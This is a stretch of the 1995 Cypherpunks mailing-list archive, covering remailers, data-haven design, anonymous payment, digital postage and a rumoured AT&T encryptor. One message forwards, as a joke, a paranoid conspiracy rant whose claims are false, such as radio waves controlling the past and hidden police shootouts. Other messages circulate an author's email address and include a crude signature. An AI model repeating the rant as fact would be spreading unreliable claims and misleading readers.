option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. special Accepts only pgp encrypted messages. ek Encrypt responses in relpy blocks using Encrypt-Key: header. Comments and suggestions welcome! Raph Levien From pcw at access.digex.net Mon Jan 9 07:09:57 1995 From: pcw at access.digex.net (Peter Wayner) Date: Mon, 9 Jan 95 07:09:57 PST Subject: Vinge's True Email name ? Message-ID: <199501091510.AA16373@access3.digex.net> >Lou Poppler says: >> I knew that old compuserve account was good for something. >> They list Vinge, Vernor San Diego CA 72267.2656 at compuserve.com > Of course, he might have used his true name because he wanted to hear from people. Tom Clancy seems to enjoy the newsgroup created to discuss his books and he posts there regularily. Many people strive to become famous because they love the adolation of the fans. Others don't. Who knows about VV? From RGRIFFITH at sfasu.edu Mon Jan 9 07:32:20 1995 From: RGRIFFITH at sfasu.edu (RGRIFFITH at sfasu.edu) Date: Mon, 9 Jan 95 07:32:20 PST Subject: Anonymous payment scheme Message-ID: <01HLMZ1MIHOM000TCU@TITAN.SFASU.EDU> >At 09:45 AM 1/3/95 -0800, Hal wrote: >> ... As I wrote, banks are >>required to get SS#'s for depositers right now, and I wouldn't expect >>that to change any time soon. If anything, the trend appears to be >>towards more tightening rather than less. ... > >Isn't that only a requirement on interst-bearing, or potentially >interest-bearing, accounts? > > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com > Yes, but the account form will have a place for it anyway and the account opening person will demand it. My experience a few years ago was that I had to go to an officer and point out that the account was not interest bearing and so the SS# was not required in order to get the account opened without it. From nesta at nesta.pr.mcs.net Mon Jan 9 07:37:40 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Mon, 9 Jan 95 07:37:40 PST Subject: Data Haven problems In-Reply-To: Message-ID: On Mon, 9 Jan 1995, Mats Bergstrom wrote: > Hardly. (*.gi0 and *.jp0 for a start?) > But what are data havens for, if not for controversial data? > One of the greatest needs, if not _the_ greatest, in our times > for a data haven is probably for storing porno. There is a > tremendous, world-wide demand for porno. Yet, there are numerous > countries where sex.gif's found on your disk (encrypted or not, > they can use thumb-screws to force the key out of your hands) > will put you in a very difficult situation (loss of social > status, jail, decapitation). It might be much more convenient > for, let's say, a Saudi teenager to store his encrypted private > gif's in a data haven in Sweden, download them when he feels > the urge and purge the copies after every use. My feelings exactly. Are we going to fall prey to the medias asault on porno and resort to self-censorship? If a data haven resorted to filtering out all gifs and jpegs, or even porno, then it wouldn't be one I wouldn't use it, for my porn, nor for my other data. If it is going to be a datahaven it can;t fall to such things as filtering data for controversial subject the owner doesn't like. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From paul at poboy.b17c.ingr.com Mon Jan 9 07:45:17 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Mon, 9 Jan 95 07:45:17 PST Subject: Data Haven problems In-Reply-To: <199501071710.LAA21334@pentagon.io.com> Message-ID: <199501091546.AA19741@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- > Any ideas on how to guard against mailbombs, and to confirm to the sender > that their files are stored successfully? Perhaps do a mailing with > a test command that validates the existance of the file, and sends a > reply back wether the file is okay or not, or would this result in a > possible security hole? To solve problem #1, use digital postage of some form. Digicash, FV, Tacky Tokens, Mountain Dew futures... just require a per-storage-unit charge _to initially check in the file_. You can of course charge for storage over time, too. To solve problem #2, send an MD5 hash of the file back to the sender. Ideally, you would also provide (in perl, C source, csh, or whatever) a submission script which outputs an MD5 hash before the file is sent. As long as the before-sending hash matches the hash returned by the haven, you can assume that the file is intact. > Lastly, instead of postage (like a remailer would get), how hard would it > be to implement "rent" where if the "rent" is not paid, and a grace period > has elapsed the file would be trashed. All this while preserving the > anonymity of the sender and the data haven site. Not very. Use a dbm database to map "rent due" dates by file, then periodically sweep through the database. > As to the code, this will have to be my second rewrite as I am going to > do it in perl code, rather than C... last rewrite was from a daemon to > a program activated by a .forward file. Perl has the nice property of being fairly portable, too. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxFaRafb4pLe9tolAQH3EwQAmokOebOJtSbny7rAphWBE7n38XvWYbwy SMFXmctU6DNnM+9oGTtlaROTUy2jbbt6zDf1/1wIOG/p0C6K7BAD8lt0mkrf4OqN As1yf9JLxtTHgYIKF94aUiGiqCUo5zWe12CB+GwZ9LKma4BxXKqT3iCYrjQL+2Su us2wL5AVRd4= =McPN -----END PGP SIGNATURE----- From agarcia at Starbase.NeoSoft.COM Mon Jan 9 08:27:41 1995 From: agarcia at Starbase.NeoSoft.COM (Anthony Garcia) Date: Mon, 9 Jan 95 08:27:41 PST Subject: Vinge's True Email name ? In-Reply-To: <199501091510.AA16373@access3.digex.net> Message-ID: <199501091628.KAA00456@Starbase.NeoSoft.COM> As Wei Dai pointed out, the hostname of Vernor Vinge's office workstation at San Diego State University can be easily determined in about 5 minutes of poking about. (He appears to have about 10-15 shells running at any given time...) I really enjoy his work. However, I've never sent him any email. The general impression I've gotten is that he prefers not to receive fan email, since it distracts him from important work. If you *really* want to send him fan mail, I recommend sending it in paper form to his publisher. First, this allows him to better handle fan mail in batches. Second, this gives his publisher some indication of interest in his work, and maybe gets him a better deal on his next book. -Anthony Garcia agarcia at neosoft.com From rsalz at osf.org Mon Jan 9 08:28:01 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 9 Jan 95 08:28:01 PST Subject: Remailer Abuse Message-ID: <9501091624.AA05922@sulphur.osf.org> What lists did you post to? From rfb at lehman.com Mon Jan 9 09:01:00 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Mon, 9 Jan 95 09:01:00 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <9501091655.AA24435@cfdevx1.lehman.com> -----BEGIN PGP SIGNED MESSAGE----- From: "Jim Grubs, W8GRT" Date: Tue, 13 Dec 94 11:27:45 EST Rick Busdiecker writes: > Even Apple & Microsoft agree that Netscape is brain dead... Please be more careful in your attributions. The extent to which I wrote the above comment is that I quoted it from someone else's article. Rick -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLxFqg5NR+/jb2ZlNAQFRbwP/cPEMxF4aSfGPyi7gbudxG6NGUtNl9Ted hsCDzg4KLb1jRTtwt66c6R+W8Qd1ekZw6kv9qbCu/xiIDNI4DG0Z9VUyt4a4+EdE v45i5An70yLUS6wd7ncicH4Rxoo4KxU2fOwe5PZWzBAWHWRQA8zOB8pbpbwZcg6Q BCkf6Q6jGTc= =ngk4 -----END PGP SIGNATURE----- From eric at remailer.net Mon Jan 9 09:09:35 1995 From: eric at remailer.net (Eric Hughes) Date: Mon, 9 Jan 95 09:09:35 PST Subject: More signal than YOU can handle. In-Reply-To: <199501090837.DAA29692@bb.hks.net> Message-ID: <199501091709.JAA25055@largo.remailer.net> From: "L. Todd Masco" For the moment, all of the archives that Eric just dropped me are on ftp://ftp.hks.net/cypherpunks/All This includes all the stored messages at toad.com from the beginning of time up to a few months ago. I've got a short lacuna at toad.com from some deletion I never understood, but it's only a few weeks long and is covered by Todd's archive. I would like someone to make an official enumeration of the articles as they passed out to the list for global reference. You may self-volunteer by grabbing the archives above and starting. Eric From eric at remailer.net Mon Jan 9 09:24:53 1995 From: eric at remailer.net (Eric Hughes) Date: Mon, 9 Jan 95 09:24:53 PST Subject: Data Haven problems In-Reply-To: <199501071710.LAA21334@pentagon.io.com> Message-ID: <199501091724.JAA25074@largo.remailer.net> From: dfloyd at io.com While programming my data haven code, I am wondering how to guard against spamming the data haven parser. Here's an example of where the mechanism/policy distinction helps a lot. Mechanism here is how you store data. Policy is how you decide whether to accept a particular request. The suggestions to date have all suggested particular policies to put into your code (with the exception of Bill Stewart). In addition, almost all of these suggestions have been pay-per-use. As significant as policies are, they aren't your most important issue right now. The single thing you need to get right today is the means of separating the mechanism from the policy. Different operators will have different policies. If it's difficult to change policies, fewer services will be offered. The issue of policy separation is a software architecture one. I don't know the structure of your code, but I'd suggest that whatever it looks like, that you make a (1) clean interface and that you (2) document it. If you do these two things, you'll have substantially achieved separation. I think you should spend more time worrying about the interface than about the specific policies. In order to focus on the policy interface, I'd suggest an extremely simple policy to work with, namely, an access list. Anyone listed can use the server; everyone else is denied. That will get you started. I would distribute your first code with a simple policy such as this. It will allow prototypes to get worked on. Since a data haven isn't of much use without clients for it, a simple policy is adequate for a first release. Eric From a.brown at nexor.co.uk Mon Jan 9 09:28:31 1995 From: a.brown at nexor.co.uk (Andy Brown) Date: Mon, 9 Jan 95 09:28:31 PST Subject: RC5 data, anyone? Message-ID: Has anyone got any plaintext/cyphertext/key data sets that I can use to test my RC5 implementation against? +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ From bdolan at well.sf.ca.us Mon Jan 9 09:54:33 1995 From: bdolan at well.sf.ca.us (Brad Dolan) Date: Mon, 9 Jan 95 09:54:33 PST Subject: Rumored CBS "hit" on internet coming Message-ID: <199501091755.JAA10056@well.sf.ca.us> This may be old news or it could be bogus but fyi anyway: >From parsons at bga.com Mon Jan 9 05:16:49 1995 >From: Brad Parsons >Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd) >To: bdolan at well.sf.ca.us > > >Brad, Could you forward this to the cypherpunks list? Thanks.--BJP > >---------- Forwarded message ---------- >Date: Mon, 9 Jan 1995 03:48:01 -0600 (CST) >Subject: CBS/C.Chung Plan Hit Job on Internet? > >A friend tells me that CBS and Connie Chung plan a hit job on Internet >on the evening news today, 1/9/95. Apparently it may be in the context >of youths supposedly learning how to make bombs from online info. In >case I don't get to watch it, could somebody make it a point to watch >it and give us a summary of the report. Thanks. Reply, if you're inclined, via e-mail. I'm off the list until the Carol Ann stuff dies out. - Brad Dolan, bdolan at well.sf.ca.us  From s675570 at aix1.uottawa.ca Mon Jan 9 10:48:35 1995 From: s675570 at aix1.uottawa.ca (Angus Patterson) Date: Mon, 9 Jan 95 10:48:35 PST Subject: Vinge's True Email name ? In-Reply-To: <199501091628.KAA00456@Starbase.NeoSoft.COM> Message-ID: On Mon, 9 Jan 1995, Anthony Garcia wrote: > If you *really* want to send him fan mail, I recommend sending it in > paper form to his publisher. First, this allows him to better handle I can see your point, but since it's been asked (and you're all responsible people and he knows about killfiles) This is the address I just found in the cyberpunk faq : vinge at aztec.sdsu.edu And btw, thanks for all the replies to my True Names question. I did end end up finding it (on loan), but somehow this city's used bookstores seem to have every one of his books but True Names. Sigh... Back to crypto though, would anybody know about any more recent works on the NSA than Puzzle Palace (other than the Wired articles or the NSA handbook that was posted to the net)? For that matter, has anybody heard of a recently published book on the Canadian Security Establishment (it came out just two months ago I think, I just can't remember the author or title) or anything else on that agency? Mucho Thank you. From nissim at acs.bu.edu Mon Jan 9 10:51:09 1995 From: nissim at acs.bu.edu (nissim at acs.bu.edu) Date: Mon, 9 Jan 95 10:51:09 PST Subject: positive publicity for anonymity Message-ID: <199501091843.NAA112415@acs.bu.edu> I've just posted a proposal to alt.config for a new group alt.temping I'm hoping that temporary workers will use this as a forum to compare and contrast temp agencies, wage differences, 'permanent hire penalties' etc. There are about 4.4 million business service temps in the US. Wage differentials are noticeable - one egency will pay $2.00 more than another; this means $320/month to a temp worker. I expect temps to use anonymous posting capabilities to compare wage rates and company patterns *anonymously* because they may fear discrimination from their agencies. (I know I would) This seems like a very positive use of anonymity. Not only will millions of people on the bottom rung of office life be able to gain advantage by information, there are clear parallels to areas in the past of the left where unions and workers rights were seen as causes of first importance. In fact, the troubles involved in being temporary have been championed several times on television. This might make a good counterargument to 'teenagers and pipe bombs' If we say anonymity is a tool that helps up to 3-4% of the work force make intelligent choices and get paid more we may key into the left wing slant of the media. Treon Verdery (not posting from Adam's account this time!) From perry at imsi.com Mon Jan 9 11:07:22 1995 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 9 Jan 95 11:07:22 PST Subject: AT&T produces video encryptor -- is it clipper based? Message-ID: <9501091904.AA19196@webster.imsi.com> I just saw a story go by on the dow jones wire saying that AT&T had developed a "comprehensive security system for commercial information services". It is said to be an encryption system developed jointly by Bell Labs and VLSI, and its intedned for set-top boxes and "the internet". VLSI was one of the contractors on Clipper. Anyone know if this is an "escrowed" system? Anyone know any other details? Perry From ghio at c2.org Mon Jan 9 11:32:46 1995 From: ghio at c2.org (Matthew Ghio) Date: Mon, 9 Jan 95 11:32:46 PST Subject: Remailer source In-Reply-To: <199412301935.AA22766@von-neumann.info.polymtl.ca> Message-ID: <199501091929.LAA22433@infinity.c2.org> Octavian Ureche wrote: > Does anybody know where could I find UNIX sources > for a remailer ? ftp cs.cmu.edu /afs/andrew.cmu.edu/usr12/mg5n/public/remailer From tcmay at netcom.com Mon Jan 9 11:47:52 1995 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 9 Jan 95 11:47:52 PST Subject: Experiments and Toys vs. the Real Thing Message-ID: <199501091946.LAA06410@netcom18.netcom.com> The debate about data havens and what they ought to really be, what they ought to really accept, etc., is similar to debates about what digital money ought to be, how remailers ought to operate, etc. It's useful to categorize projects as "experimental" (or "toy," with no negative connotations implied) or "commercial" (or "real," I suppose): * EXPERIMENTAL, or TOY: Early efforts, meant to help illuminate the issues, uncover problems, gain knowledge, educate people, etc. * COMMERCIAL, or REAL: More robust, well-established. Usually "for pay," and expected to be maintained, available, professionally operated. Now there's a fuzzy distinction between these, a continuum, really. For example, PGP began life (esp. as v. 1.0) as an amateur or experimental thing, with a few hacker experimentalists playing with it. Version 2.x has been usable as a commercial tools, every bit as good as "MailSafe," the ostensibly commerical RSADSI tool. The user community has added enough capability and hooks to clearly put PGP in the COMMERCIAL category: robust, supported, etc. Remailers are _almost_ in the second category, especially when taken as an ecological whole. (That is, any single remailer may be flaky--though many aren't--but the pinging and reputation tools that support the ecology make the ensemble more robust and usable.) Many of us believe that "digital postage" paid remailing will be the final step needed to move remailers into the commercial/real category. Until thien, they're not businesses--they're hobbies and experiments. (Which is fine, as one of the main reasons for Cypherpunks was to take the academic papers presented at Crypto conferences and reify them in working code, as experiments.) Digital cash is more clearly still at the experimental level, as are anonymous markets (like BlackNet), data havens, and so forth. Why do I mention these points? Because there's a danger in "premature professionalization." And a danger in criticizing experimental or toy efforts for not being "pure enough." The recent claims that nascent "data havens" _must_ support all files, including hard-core porn, weapons secrets, etc. seems to be an example of this. I'm not for censorship, just concerned that the data haven _experiments_ are not secure enough, not robust enough, to actually carry high-visibility files. For example, data havens will clearly someday be used to carry defense secrets, troop movements, weapons manufacturing details, etc. But I would not want to carry them on my "experimental data haven," for obvious reasons. Even if I only carried "non-American" secrets, such as reports on Russian troop manouvers around Grozny, I could expect visits from American officials (to stop me, to plant data they want planted, etc.). (And let's not forget "snatch teams" that grab foreign nationals suspected of crimes...Israel, Iraw, Iran, and the U.S. have grabbed people in other countries. And more common is simple execution. If a Swedish data haven carried files related to U.S. operations, and the data haven location was known--part of what I mean by saying the enabling technologies do not yet exist--then various measures would be applied. Diplomatic, equipment sabotoage, even killing the operators. I'm not being Ludlumesque here...clearly such "threats to national security" would be seen as justifying various reactions. Especially to send a message to other potential operators.) Those advocating a "purist" (= professional/real) approach to data havens, seen recently in the calls for data havens to never screen files or accesses, should bear in mind that "data haven technology" is lacking. Remailer chains leading in and out of data havens are still non-robust, subject to attacks and compromises. And of course, digital cash is still being thrashed out. An experimental data haven that allowed unscreened access or depositing of information would also become a a magnet for kooks, for those wishing to sabotage such havens, etc. If truly serious information was found on the haven, huge efforts would be mounted to find the source, get the site shut down, etc. Current remailer technology is just not up to the challenge. (I'm not saying it won't someday be, just not now.) Criticizing experimental data havens for "not going all the way" seems to me to be wrong-headed. First, there's the usual issue of who bears the risk, with those not at risk urging others to put themselves and their sites are risk by being "pure." Second, and more important, the enabling technologies for data havens are just not yet themselves available and robust. A data haven that carries "Four Horseman of the Infocalypse" material will come under strong attack, legal, cryptographic, and physical. There's a place for experimental or toy implementations, e.g., data havens that operate in some limited domain. This allows the issues to get explored before full-scale attacks are mounted. Think of it as a training exercise, a drill, or an immunization. --Tim May, who thinks the first real data havens will come under intense attack and so had better be secure from the start -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From ddt at lsd.com Mon Jan 9 11:48:43 1995 From: ddt at lsd.com (Dave Del Torto) Date: Mon, 9 Jan 95 11:48:43 PST Subject: HUMOR:...and we thought _PRZ_ had troubles! Message-ID: My apologies for this non-crypto posting, but I just _couldn't_ resist sharing. Ironically (incredulously?), paranoia does nothing to improve one's grasp of adjectives and adverbs... Anyway, please, please restrict your replies (if any) to private email amongst yourselves and don't follow my poor example and post anything more about it to the list. BTW..."Half" street?! dave ____________________________________ "Fascinating, Captain." -Mr. Spock =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Newsgroups: alt.alien.visitors Subject: Truth or Paranoia? From: doctor.doom at citylink.uu.holonet.net Date: Fri, 6 Jan 95 21:56:00 EST I found the following disturbing post on a BBS in the Washington DC area: Msg # 48 of 83 Date: Fri 12-03-93, 6:29 pm From: UNIT Read: 7 times [1 Reply] Forwarded From: 1900 Half Street, SW Subject: important The story I am about to relate may seem incredulous in many ways even thought it is true and I solemly attest that it is true despite the fact that it seems incredulous in many ways there is verifiable evidence and i urge you to verify the evidence on your own if you should find this incredulous which is the natural response. I am a victim of government sponsored terrorism and racism sponsored by the us government and big corporations which actually work HAND IN HAND with the us government towards these ends. This of course includes the liberal media although some cells of independence remain and not all individual journalists are accessories to the conspiracy. Suffice it to say that democracy does not in any way exist in the United States of AmeriKKKa. The government has been out to get me ever since I was born in 1966 as a result of a specific genetic coding abnormality which makes me unique among the 99.9999 th percentile of the American population and makes people like me marked for harrassment. The abnormality may have been spawned by mass CIA mind control tests conducted in 1961, which affected certain birth patterns. They actually have attempted to cause me to try to kill myself on several occasions and have attempted to drive me crazy by chemical and psychological means including retroactive radio control from the future (any scientist will tell you that radio waves which move faster than light speed are capable of moving backwards in time and thus controlling the past). The constant chemical assaults on my well being mean I cannot leave my apartment except in dire circumstances and then I must breathe through a gas mask. Not only that but people are strategically placed at all places I interact with people out of necessity (I cannot avoid such encounters entirely) to make me self aware and paranoid. These efforts are futile and I continue to defy the Amerikkkan government. On June 11 1986 they deliberately influenced me by radio to be present at the intersection of Sherman Avenue and Harvard Street NW at precisely 1:42 am and I had to cross seven blocks of territory that had been sealed by the police. This is documented. I witnessed seven police forces engaged in a shootout that lasted three hours. THe police forces were shooting at EACH OTHER and I counted at least thirty verifiable casualties. Although this has never made the newspapers due to the government/corporate conspiracy the information is readily obtainable but must be sought through FOIA requests at the FBI. The files are disguised as traffic fatalities and the true cause of death is not noted. Also documentable is my genetic trait which Johns Hopkins in Baltimore will provide upon demand. I am considered a threat to the CIA because of my superior evolutionary status and my radical thoughts. In 1971 the United States abandoned the Bretton Woods system of fixed exchange rates and secretly implemented a dual currency system along with ruling elites from other major countries including the USSR and Red China. I know this because agents have tried to buy me off with this currency which exists solely in the form of informational transactions and has no physical manifestations yet makes a mockery of the valueless Dollar. I am a man of integrity and I refused to participate in this plot. Needless to say the federal deficit is measured in dollars and is therefore nonexistent and irrelevant. The secret currency system is solvent. In 1987 the Wall Street Journal documented the cataclysmic stock market crash but made no mention of the real underlying factors behind it, which again represented a government conspiracy. After I wrote to the Wall Street Journal to point this out, attempts to kill me trebled. There are also listening devices implanted everywhere to monitor my actions and junk mail sorted with DMSO and curare arrives daily. I remove the mail with tweezers and leave it on the counter for the mailman as unreturnable. He wears gloves of course. The only reason I am still alive is because I persist in making my case public at every opportunity, which means the government does not directly try to kill me but relies on third-party means which I have so far avoided. A rental car I obtained in Sausalito in 1989 was irradiated with depleted uranium which increased the total mass of the car by 33% d would have caused me to go over a cliff were it not for the normal precaution I take of always driving 15 mph under the speed limit. But it is this kind of insidiousness which I am consdtantly faced with. I also can only cross the street in crosswalks so that any attempt to kill me with a vehicle could not be blamed on pedestrian error. The only reason I am still alive is because I persist in making my case public at every opportunity, which means the government will not try to kill me directly, since that would verify my claims instantly in the public's eyes. For that reason I urge all of you to write to the media, contact your senators, and do everything you can to let the conspirators know that my story has been heard, and that the eyes of the public are upon the conspiracy. It is only through concerted collective action that I can remain alive and the AmeriKKKan government which has been ruling illegitimately since a secret coup in 1947 (documented at the Library of Congress) can be brought down and freedom restored. -end?- From tcmay at netcom.com Mon Jan 9 11:56:00 1995 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 9 Jan 95 11:56:00 PST Subject: Rumored CBS "hit" on internet coming In-Reply-To: <199501091755.JAA10056@well.sf.ca.us> Message-ID: <199501091955.LAA07671@netcom18.netcom.com> > >Subject: CBS/C.Chung Plan Hit Job on Internet? > > > >A friend tells me that CBS and Connie Chung plan a hit job on Internet > >on the evening news today, 1/9/95. Apparently it may be in the context > >of youths supposedly learning how to make bombs from online info. In > >case I don't get to watch it, could somebody make it a point to watch > >it and give us a summary of the report. Thanks. Argghh!! When Connie interviewed me last week, she said I could _whisper_ some dark uses to her and it would just be between the two of us! Life's a bitch, and so is Connie. > Reply, if you're inclined, via e-mail. I'm off the list until the Carol > Ann stuff dies out. - Brad Dolan, bdolan at well.sf.ca.us It seems to have gone through the "Newbie-nova" (a double newism?) phase and is already dropping exponentially. (By Newbie-nova I mean the spate of initial posts. I know the syndrome, as I made several posts on my first day on "Cyberia.") --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From rsalz at osf.org Mon Jan 9 12:49:04 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 9 Jan 95 12:49:04 PST Subject: intelligent discovery agents Message-ID: <9501092044.AA08382@sulphur.osf.org> >Visit Sang at http://www.inlink.com/users/sangria/homepage.html >Sang has more information on Robots, Spiders, Ants, and Worms >than any other computer person I have yet to link up with. I suspect your original respondent doesn't get around very much. Rummaging around the above URL gets you little more then http://web.nexor.co.uk/mac/doc/robots/robots.html Tracing down the above URL points you to You really want to get the WWW conference proceedings; try email to wwwf94 at osf.org and also http://www.ncsa.uiuc.edu/SDG/IT94/Proceedings/Agents.html Ob-crypto: there is a Security.html (instead of Agents) but it's more commerce-oriented, except for the DCE Web paper. From sandfort at crl.com Mon Jan 9 13:08:54 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 9 Jan 95 13:08:54 PST Subject: for-pay remailers and FV In-Reply-To: <199501070231.SAA20999@largo.remailer.net> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, > . . . a remailer consortium would do best to issue a local banknote > usable only by themselves and have customers settle with the > consortium issuer, rather than any member of the consortium itself. > If the consortium issuer were to use blind sigs, the consortium > members wouldn't be able to ascertain who paid. > > The mechanism for settlement could be credit cards directly, mailed in > checks, even FV. The preferences of the consortium members for issues > of timeliness of settlement, reversibility, loss sharing, etc. would > decide the actual choice of settlement mechanism. > . . . Gee, this sounds awfully familiar. Maybe Eric will have more luck in getting you remailer folks to listen. I hardly got so much as a peep when I suggested that a remailers' guild create or authorize one or more digital stamp issuers. Damn, I hate being so far ahead of my time. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From mab at research.att.com Mon Jan 9 13:10:05 1995 From: mab at research.att.com (Matt Blaze) Date: Mon, 9 Jan 95 13:10:05 PST Subject: AT&T produces video encryptor -- is it clipper based? In-Reply-To: <9501091904.AA19196@webster.imsi.com> Message-ID: <9501091944.AA07520@merckx.info.att.com> >I just saw a story go by on the dow jones wire saying that AT&T had >developed a "comprehensive security system for commercial information >services". It is said to be an encryption system developed jointly by >Bell Labs and VLSI, and its intedned for set-top boxes and "the >internet". VLSI was one of the contractors on Clipper. Anyone know if >this is an "escrowed" system? Anyone know any other details? > > >Perry I wasn't involved in this product, but i know the people who are. No, It's not clipper based. It's beimngh announced (right now) at the rsa cinference (which I'm at tat the moment). More later -matt From db at Tadpole.COM Mon Jan 9 14:34:50 1995 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 9 Jan 95 14:34:50 PST Subject: for-pay remailers and FV In-Reply-To: Message-ID: <9501092235.AA15387@tadpole.tadpole.com> Sandy -- I for one read your proposal and thought, "yep, that's how it should work" and considered the problem solved. Not being a remailer operator (yet) I didn't want to get involved until I was or I had a more concrete proposal (e.g., "I am now accepting $$ for E-stamps, of the form ...") Also, there is no reason on earth to take FV for payment under such a scheme, if one wishes to preserve anonymity, and not have to deal with the fraud/reversal factors. (The stamp issuer would not know which blind-signed stamps were issued to the turkey who reversed all his credit card transactions two months after buying them -- see various threads on this vis-a-vis using FV to buy blinded digital cash and why it won't work too well.) However, for maximum anonymity, said consortium or other stamp issuer could easily accept money orders through the mail, with a disk with enclosed blind-signed tokens and the public key to be used in encrypting the stamps, which would be posted to, say, alt.anonymous.messages or whatever. A little overboard for most, but effective at preserving anonymity -- the stamp issuer could be the NSA, and it would make little difference as long as they continued exchanging $$ for stamps and redeeming stamps for $$. The stamp issuer could also take checks, or, if the fraud and reversability of credit cards were factored in, accept credit cards directly (possibly e-mailed using PGP.) I don't see any reason to get FV involved, unless one were so lame as to be unable to get signed up directly with the credit card companies as a merchant -- a process of appropriate complexity to indicate the posession of at least one (1) clue, which is prob. desirable in someone who's going to be handling remailer finances Sandy writes: > Gee, this sounds awfully familiar. Maybe Eric will have more > luck in getting you remailer folks to listen. I hardly got so > much as a peep when I suggested that a remailers' guild create > or authorize one or more digital stamp issuers. > > Damn, I hate being so far ahead of my time. > From jamesd at netcom.com Mon Jan 9 15:19:01 1995 From: jamesd at netcom.com (James A. Donald) Date: Mon, 9 Jan 95 15:19:01 PST Subject: (fwd) Re: Racism on the Internet Message-ID: <199501092317.PAA08453@netcom5.netcom.com> Xref: netcom.com alt.internet.services:40076 alt.internet.media-coverage:2932 Path: netcom.com!ix.netcom.com!howland.reston.ans.net!pipex!uunet!nwnexus!news.halcyon.com!usenet From: mpdillon at halcyon.com (Michael Dillon) Newsgroups: alt.internet.services,alt.internet.media-coverage Subject: Re: Racism on the Internet Date: Wed, 28 Dec 1994 18:11:51 +0000 Organization: Memra Software Inc., Armstrong, B.C., Canada Lines: 36 Message-ID: References: <18570UODGFHLRSDHOUP at curvet.com> NNTP-Posting-Host: halcyon.com This is forwarded from can.infohighway. Note the quote from Rutkowski at the bottom. This info should be more generally know on the net. In article <18570UODGFHLRSDHOUP at curvet.com>, dshaw at curvet.com wrote: > > IN>ae763 at FreeNet.Carleton.CA (Harvey Goldberg) writes: > > >I work for the Canadian Human Rights Commission. > >I am currently doing research on the use of the > >Internet for the propagation of hate material. > >The purpose of the research is to determine what > >measures could be considered to control the use > >of the Net for this type of purpose. > > >I would appreciate hearing from anyone who has > >any views, information or comments on this > >subject or who know of anywhere on the Internet > >where this matter is discussed. > > According to Tony Rutkowski, Executive Director of the Internet > Society, "The Internet from a regulatory standpoint falls into the > category of private value-added networks, and in most countries under > the treaty provisions of the ITU, as well as the GATT, these are > networks that are outside the purview of government. To the extent > that there is any kind of obligation by governments, it is to allow > such networks to exist on a competitive basis". January 1995>. --------------------------------------------------------------------- Cool cats, brick bats, bad boys wearin' big hats Surf's up, my cup, floating, flying, rising up. Michael Dillon mpdillon at halcyon.com C-4 Powerhouse, RR #2 michael at junction.net From abostick at netcom.com Mon Jan 9 15:21:38 1995 From: abostick at netcom.com (Alan Bostick) Date: Mon, 9 Jan 95 15:21:38 PST Subject: Data Haven problems In-Reply-To: <9501090448.AA14477@anchor.ho.att.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <9501090448.AA14477 at anchor.ho.att.com>, you wrote: > Filtering by filename and type can also be useful - if you don't allow > files named *.gif and *.jpg, users may be less likely to > spam you with pornography. Namespace control in general is an issue - > do users get to choose filenames, or list directories, or do they > have to know the names of files to retrieve. > Another issue is whether files can only be retrieved by the sender - > probably a local policy issue. Pornographic images aren't spam _per_se._ What makes them troublesome is the huge number of people who wish to download them when their availability is widely known. (My ISP's ftp site is being bogged down by lots of accesses; it is speculated that these are people trying to access pornography kept there.) The obvious fix here is the same as the proposed fix for remailer spamming: charge for access. As a (presumably) fixed-location data haven, one would want to be able to use some kind of anonymous e-money for payment, but one could also use good, old-fashioned credit card numbers, too. The feelthy peexture business might well be the cash cow that keeps a data-haven/fortress remailer afloat (if that's not too mixed a metaphor). | PROOF-READER, n: A malefactor who atones for Alan Bostick | making your writing nonsense by permitting abostick at netcom.com | the compositor to make it unintelligible. finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 